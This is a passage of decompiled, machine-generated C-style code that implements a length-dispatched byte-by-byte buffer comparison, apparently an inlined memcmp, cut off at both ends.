																			__ecx = _t917 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xa) & 0x000000ff;
																			__eax =  *(__edx - 0xa) & 0x000000ff;
																			__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t923 = __ecx > 0;
																				__eflags = _t923;
																				__eax = 0 | _t923;
																				__ecx = _t923 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 9) & 0x000000ff;
																				__eax =  *(__edx - 9) & 0x000000ff;
																				__ecx = ( *(__esi - 9) & 0x000000ff) - ( *(__edx - 9) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t929 = __ecx > 0;
																					__eflags = _t929;
																					__eax = 0 | _t929;
																					__ecx = _t929 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 8) & 0x000000ff;
																					__eax =  *(__edx - 8) & 0x000000ff;
																					__ecx = ( *(__esi - 8) & 0x000000ff) - ( *(__edx - 8) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t935 = __ecx > 0;
																						__eflags = _t935;
																						__eax = 0 | _t935;
																						__ecx = _t935 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L493;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xc:
																	L188:
																	_t1061 =  *(_t1354 - 0xc);
																	__eflags = _t1061 -  *(_t1340 - 0xc);
																	if(_t1061 ==  *(_t1340 - 0xc)) {
																		goto L201;
																	} else {
																		_t1270 = (_t1061 & 0x000000ff) - ( *(_t1340 - 0xc) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t355 = _t1270 > 0;
																			__eflags = _t355;
																			_t1270 = (0 | _t355) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xb) & 0x000000ff) - ( *(_t1340 - 0xb) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t361 = _t1270 > 0;
																				__eflags = _t361;
																				_t1270 = (0 | _t361) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xa) & 0x000000ff) - ( *(_t1340 - 0xa) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t367 = _t1270 > 0;
																					__eflags = _t367;
																					_t1270 = (0 | _t367) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 9) & 0x000000ff) - ( *(_t1340 - 9) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t373 = _t1270 > 0;
																						__eflags = _t373;
																						_t1270 = (0 | _t373) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L201;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0xd:
																	L281:
																	__eax =  *(__esi - 0xd);
																	__eflags =  *(__esi - 0xd) -  *(__edx - 0xd);
																	if( *(__esi - 0xd) ==  *(__edx - 0xd)) {
																		goto L294;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xd) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t531 = __ecx > 0;
																			__eflags = _t531;
																			__eax = 0 | _t531;
																			__ecx = _t531 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xc) & 0x000000ff;
																			__eax =  *(__edx - 0xc) & 0x000000ff;
																			__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t537 = __ecx > 0;
																				__eflags = _t537;
																				__eax = 0 | _t537;
																				__ecx = _t537 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xb) & 0x000000ff;
																				__eax =  *(__edx - 0xb) & 0x000000ff;
																				__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t543 = __ecx > 0;
																					__eflags = _t543;
																					__eax = 0 | _t543;
																					__ecx = _t543 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xa) & 0x000000ff;
																					__eax =  *(__edx - 0xa) & 0x000000ff;
																					__ecx = ( *(__esi - 0xa) & 0x000000ff) - ( *(__edx - 0xa) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t549 = __ecx > 0;
																						__eflags = _t549;
																						__eax = 0 | _t549;
																						__ecx = _t549 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L294;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xe:
																	L374:
																	__eax =  *(__esi - 0xe);
																	__eflags =  *(__esi - 0xe) -  *(__edx - 0xe);
																	if( *(__esi - 0xe) ==  *(__edx - 0xe)) {
																		goto L387;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xe) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t713 = __ecx > 0;
																			__eflags = _t713;
																			__eax = 0 | _t713;
																			__ecx = _t713 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xd) & 0x000000ff;
																			__eax =  *(__edx - 0xd) & 0x000000ff;
																			__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t719 = __ecx > 0;
																				__eflags = _t719;
																				__eax = 0 | _t719;
																				__ecx = _t719 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xc) & 0x000000ff;
																				__eax =  *(__edx - 0xc) & 0x000000ff;
																				__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t725 = __ecx > 0;
																					__eflags = _t725;
																					__eax = 0 | _t725;
																					__ecx = _t725 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xb) & 0x000000ff;
																					__eax =  *(__edx - 0xb) & 0x000000ff;
																					__ecx = ( *(__esi - 0xb) & 0x000000ff) - ( *(__edx - 0xb) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t731 = __ecx > 0;
																						__eflags = _t731;
																						__eax = 0 | _t731;
																						__ecx = _t731 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L387;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0xf:
																	L467:
																	__eax =  *(__esi - 0xf);
																	__eflags =  *(__esi - 0xf) -  *(__edx - 0xf);
																	if( *(__esi - 0xf) ==  *(__edx - 0xf)) {
																		goto L480;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0xf) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t892 = __ecx > 0;
																			__eflags = _t892;
																			__eax = 0 | _t892;
																			__ecx = _t892 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0xe) & 0x000000ff;
																			__eax =  *(__edx - 0xe) & 0x000000ff;
																			__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t898 = __ecx > 0;
																				__eflags = _t898;
																				__eax = 0 | _t898;
																				__ecx = _t898 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xd) & 0x000000ff;
																				__eax =  *(__edx - 0xd) & 0x000000ff;
																				__ecx = ( *(__esi - 0xd) & 0x000000ff) - ( *(__edx - 0xd) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t904 = __ecx > 0;
																					__eflags = _t904;
																					__eax = 0 | _t904;
																					__ecx = _t904 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xc) & 0x000000ff;
																					__eax =  *(__edx - 0xc) & 0x000000ff;
																					__ecx = ( *(__esi - 0xc) & 0x000000ff) - ( *(__edx - 0xc) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t910 = __ecx > 0;
																						__eflags = _t910;
																						__eax = 0 | _t910;
																						__ecx = _t910 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L480;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x10:
																	L175:
																	_t1060 =  *(_t1354 - 0x10);
																	__eflags = _t1060 -  *(_t1340 - 0x10);
																	if(_t1060 ==  *(_t1340 - 0x10)) {
																		goto L188;
																	} else {
																		_t1270 = (_t1060 & 0x000000ff) - ( *(_t1340 - 0x10) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t330 = _t1270 > 0;
																			__eflags = _t330;
																			_t1270 = (0 | _t330) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0xf) & 0x000000ff) - ( *(_t1340 - 0xf) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t336 = _t1270 > 0;
																				__eflags = _t336;
																				_t1270 = (0 | _t336) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0xe) & 0x000000ff) - ( *(_t1340 - 0xe) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t342 = _t1270 > 0;
																					__eflags = _t342;
																					_t1270 = (0 | _t342) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0xd) & 0x000000ff) - ( *(_t1340 - 0xd) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t348 = _t1270 > 0;
																						__eflags = _t348;
																						_t1270 = (0 | _t348) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L188;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x11:
																	L268:
																	__eax =  *(__esi - 0x11);
																	__eflags =  *(__esi - 0x11) -  *(__edx - 0x11);
																	if( *(__esi - 0x11) ==  *(__edx - 0x11)) {
																		goto L281;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x11) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t506 = __ecx > 0;
																			__eflags = _t506;
																			__eax = 0 | _t506;
																			__ecx = _t506 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x10) & 0x000000ff;
																			__eax =  *(__edx - 0x10) & 0x000000ff;
																			__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t512 = __ecx > 0;
																				__eflags = _t512;
																				__eax = 0 | _t512;
																				__ecx = _t512 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0xf) & 0x000000ff;
																				__eax =  *(__edx - 0xf) & 0x000000ff;
																				__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t518 = __ecx > 0;
																					__eflags = _t518;
																					__eax = 0 | _t518;
																					__ecx = _t518 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xe) & 0x000000ff;
																					__eax =  *(__edx - 0xe) & 0x000000ff;
																					__ecx = ( *(__esi - 0xe) & 0x000000ff) - ( *(__edx - 0xe) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t524 = __ecx > 0;
																						__eflags = _t524;
																						__eax = 0 | _t524;
																						__ecx = _t524 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L281;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x12:
																	L361:
																	__eax =  *(__esi - 0x12);
																	__eflags =  *(__esi - 0x12) -  *(__edx - 0x12);
																	if( *(__esi - 0x12) ==  *(__edx - 0x12)) {
																		goto L374;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x12) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t688 = __ecx > 0;
																			__eflags = _t688;
																			__eax = 0 | _t688;
																			__ecx = _t688 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x11) & 0x000000ff;
																			__eax =  *(__edx - 0x11) & 0x000000ff;
																			__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t694 = __ecx > 0;
																				__eflags = _t694;
																				__eax = 0 | _t694;
																				__ecx = _t694 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x10) & 0x000000ff;
																				__eax =  *(__edx - 0x10) & 0x000000ff;
																				__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t700 = __ecx > 0;
																					__eflags = _t700;
																					__eax = 0 | _t700;
																					__ecx = _t700 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0xf) & 0x000000ff;
																					__eax =  *(__edx - 0xf) & 0x000000ff;
																					__ecx = ( *(__esi - 0xf) & 0x000000ff) - ( *(__edx - 0xf) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t706 = __ecx > 0;
																						__eflags = _t706;
																						__eax = 0 | _t706;
																						__ecx = _t706 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L374;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x13:
																	L454:
																	__eax =  *(__esi - 0x13);
																	__eflags =  *(__esi - 0x13) -  *(__edx - 0x13);
																	if( *(__esi - 0x13) ==  *(__edx - 0x13)) {
																		goto L467;
																	} else {
																		__eax =  *(__edx - 0x13) & 0x000000ff;
																		__ecx =  *(__esi - 0x13) & 0x000000ff;
																		__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t867 = __ecx > 0;
																			__eflags = _t867;
																			__eax = 0 | _t867;
																			__ecx = _t867 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x12) & 0x000000ff;
																			__eax =  *(__edx - 0x12) & 0x000000ff;
																			__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t873 = __ecx > 0;
																				__eflags = _t873;
																				__eax = 0 | _t873;
																				__ecx = _t873 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x11) & 0x000000ff;
																				__eax =  *(__edx - 0x11) & 0x000000ff;
																				__ecx = ( *(__esi - 0x11) & 0x000000ff) - ( *(__edx - 0x11) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t879 = __ecx > 0;
																					__eflags = _t879;
																					__eax = 0 | _t879;
																					__ecx = _t879 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x10) & 0x000000ff;
																					__eax =  *(__edx - 0x10) & 0x000000ff;
																					__ecx = ( *(__esi - 0x10) & 0x000000ff) - ( *(__edx - 0x10) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t885 = __ecx > 0;
																						__eflags = _t885;
																						__eax = 0 | _t885;
																						__ecx = _t885 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L467;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x14:
																	L162:
																	_t1059 =  *(_t1354 - 0x14);
																	__eflags = _t1059 -  *(_t1340 - 0x14);
																	if(_t1059 ==  *(_t1340 - 0x14)) {
																		goto L175;
																	} else {
																		_t1270 = (_t1059 & 0x000000ff) - ( *(_t1340 - 0x14) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t305 = _t1270 > 0;
																			__eflags = _t305;
																			_t1270 = (0 | _t305) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x13) & 0x000000ff) - ( *(_t1340 - 0x13) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t311 = _t1270 > 0;
																				__eflags = _t311;
																				_t1270 = (0 | _t311) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x12) & 0x000000ff) - ( *(_t1340 - 0x12) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t317 = _t1270 > 0;
																					__eflags = _t317;
																					_t1270 = (0 | _t317) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
																					_t1270 = ( *(_t1354 - 0x11) & 0x000000ff) - ( *(_t1340 - 0x11) & 0x000000ff);
																					__eflags = _t1270;
																					if(_t1270 != 0) {
																						__eflags = _t1270;
																						_t323 = _t1270 > 0;
																						__eflags = _t323;
																						_t1270 = (0 | _t323) * 2 - 1;
																					}
																					__eflags = _t1270;
																					if(_t1270 == 0) {
																						goto L175;
																					}
																				}
																			}
																		}
																	}
																	goto L228;
																case 0x15:
																	L255:
																	__eax =  *(__esi - 0x15);
																	__eflags =  *(__esi - 0x15) -  *(__edx - 0x15);
																	if( *(__esi - 0x15) ==  *(__edx - 0x15)) {
																		goto L268;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x15) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t481 = __ecx > 0;
																			__eflags = _t481;
																			__eax = 0 | _t481;
																			__ecx = _t481 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x14) & 0x000000ff;
																			__eax =  *(__edx - 0x14) & 0x000000ff;
																			__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t487 = __ecx > 0;
																				__eflags = _t487;
																				__eax = 0 | _t487;
																				__ecx = _t487 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x13) & 0x000000ff;
																				__eax =  *(__edx - 0x13) & 0x000000ff;
																				__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t493 = __ecx > 0;
																					__eflags = _t493;
																					__eax = 0 | _t493;
																					__ecx = _t493 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x12) & 0x000000ff;
																					__eax =  *(__edx - 0x12) & 0x000000ff;
																					__ecx = ( *(__esi - 0x12) & 0x000000ff) - ( *(__edx - 0x12) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t499 = __ecx > 0;
																						__eflags = _t499;
																						__eax = 0 | _t499;
																						__ecx = _t499 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L268;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x16:
																	L348:
																	__eax =  *(__esi - 0x16);
																	__eflags =  *(__esi - 0x16) -  *(__edx - 0x16);
																	if( *(__esi - 0x16) ==  *(__edx - 0x16)) {
																		goto L361;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x16) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t663 = __ecx > 0;
																			__eflags = _t663;
																			__eax = 0 | _t663;
																			__ecx = _t663 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x15) & 0x000000ff;
																			__eax =  *(__edx - 0x15) & 0x000000ff;
																			__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t669 = __ecx > 0;
																				__eflags = _t669;
																				__eax = 0 | _t669;
																				__ecx = _t669 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x14) & 0x000000ff;
																				__eax =  *(__edx - 0x14) & 0x000000ff;
																				__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t675 = __ecx > 0;
																					__eflags = _t675;
																					__eax = 0 | _t675;
																					__ecx = _t675 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x13) & 0x000000ff;
																					__eax =  *(__edx - 0x13) & 0x000000ff;
																					__ecx = ( *(__esi - 0x13) & 0x000000ff) - ( *(__edx - 0x13) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t681 = __ecx > 0;
																						__eflags = _t681;
																						__eax = 0 | _t681;
																						__ecx = _t681 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L361;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x17:
																	L441:
																	__eax =  *(__esi - 0x17);
																	__eflags =  *(__esi - 0x17) -  *(__edx - 0x17);
																	if( *(__esi - 0x17) ==  *(__edx - 0x17)) {
																		goto L454;
																	} else {
																		__ecx = __al & 0x000000ff;
																		__eax =  *(__edx - 0x17) & 0x000000ff;
																		__ecx = (__al & 0x000000ff) - ( *(__edx - 0x17) & 0x000000ff);
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			__eax = 0;
																			__eflags = __ecx;
																			_t841 = __ecx > 0;
																			__eflags = _t841;
																			__eax = 0 | _t841;
																			__ecx = _t841 * 2 - 1;
																		}
																		__eflags = __ecx;
																		if(__ecx != 0) {
																			goto L228;
																		} else {
																			__ecx =  *(__esi - 0x16) & 0x000000ff;
																			__eax =  *(__edx - 0x16) & 0x000000ff;
																			__ecx = ( *(__esi - 0x16) & 0x000000ff) - ( *(__edx - 0x16) & 0x000000ff);
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				__eax = 0;
																				__eflags = __ecx;
																				_t847 = __ecx > 0;
																				__eflags = _t847;
																				__eax = 0 | _t847;
																				__ecx = _t847 * 2 - 1;
																			}
																			__eflags = __ecx;
																			if(__ecx != 0) {
																				goto L228;
																			} else {
																				__ecx =  *(__esi - 0x15) & 0x000000ff;
																				__eax =  *(__edx - 0x15) & 0x000000ff;
																				__ecx = ( *(__esi - 0x15) & 0x000000ff) - ( *(__edx - 0x15) & 0x000000ff);
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					__eax = 0;
																					__eflags = __ecx;
																					_t853 = __ecx > 0;
																					__eflags = _t853;
																					__eax = 0 | _t853;
																					__ecx = _t853 * 2 - 1;
																				}
																				__eflags = __ecx;
																				if(__ecx != 0) {
																					goto L228;
																				} else {
																					__ecx =  *(__esi - 0x14) & 0x000000ff;
																					__eax =  *(__edx - 0x14) & 0x000000ff;
																					__ecx = ( *(__esi - 0x14) & 0x000000ff) - ( *(__edx - 0x14) & 0x000000ff);
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						__eax = 0;
																						__eflags = __ecx;
																						_t859 = __ecx > 0;
																						__eflags = _t859;
																						__eax = 0 | _t859;
																						__ecx = _t859 * 2 - 1;
																					}
																					__eflags = __ecx;
																					if(__ecx != 0) {
																						goto L228;
																					} else {
																						goto L454;
																					}
																				}
																			}
																		}
																	}
																	goto L528;
																case 0x18:
																	L149:
																	_t1058 =  *(_t1354 - 0x18);
																	__eflags = _t1058 -  *(_t1340 - 0x18);
																	if(_t1058 ==  *(_t1340 - 0x18)) {
																		goto L162;
																	} else {
																		_t1270 = (_t1058 & 0x000000ff) - ( *(_t1340 - 0x18) & 0x000000ff);
																		__eflags = _t1270;
																		if(_t1270 != 0) {
																			__eflags = _t1270;
																			_t280 = _t1270 > 0;
																			__eflags = _t280;
																			_t1270 = (0 | _t280) * 2 - 1;
																		}
																		__eflags = _t1270;
																		if(_t1270 == 0) {
																			_t1270 = ( *(_t1354 - 0x17) & 0x000000ff) - ( *(_t1340 - 0x17) & 0x000000ff);
																			__eflags = _t1270;
																			if(_t1270 != 0) {
																				__eflags = _t1270;
																				_t286 = _t1270 > 0;
																				__eflags = _t286;
																				_t1270 = (0 | _t286) * 2 - 1;
																			}
																			__eflags = _t1270;
																			if(_t1270 == 0) {
																				_t1270 = ( *(_t1354 - 0x16) & 0x000000ff) - ( *(_t1340 - 0x16) & 0x000000ff);
																				__eflags = _t1270;
																				if(_t1270 != 0) {
																					__eflags = _t1270;
																					_t292 = _t1270 > 0;
																					__eflags = _t292;
																					_t1270 = (0 | _t292) * 2 - 1;
																				}
																				__eflags = _t1270;
																				if(_t1270 == 0) {
